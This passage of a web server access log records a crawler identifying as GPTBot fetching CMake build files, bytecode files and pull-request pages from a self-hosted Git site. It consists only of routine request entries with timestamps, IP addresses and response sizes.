"/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python?display=source" [Client 74.7.227.38] [Length 11080] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:16:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/keys.json?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/keys.json" +[17/Feb/2026:16:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11898] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14033] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:50:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11897] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:50:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:50:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:50:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11848] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:50:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" +[17/Feb/2026:16:50:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx" +[17/Feb/2026:16:50:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11516] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore" +[17/Feb/2026:16:50:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts" +[17/Feb/2026:16:50:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore" +[17/Feb/2026:16:50:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11541] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts" +[17/Feb/2026:16:50:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11980] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts" +[17/Feb/2026:16:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12803] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx" +[17/Feb/2026:16:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fappsettings.json" [Client 74.7.227.38] [Length 21433] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:16:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29833] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:50:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9956] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:16:50:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:16:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29832] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11212] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29832] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:16:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29832] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29833] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:16:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:16:50:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:50:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11846] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:50:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:50:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11210] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:50:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:16:50:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11211] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11896] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11109] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11211] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11818] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29832] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr 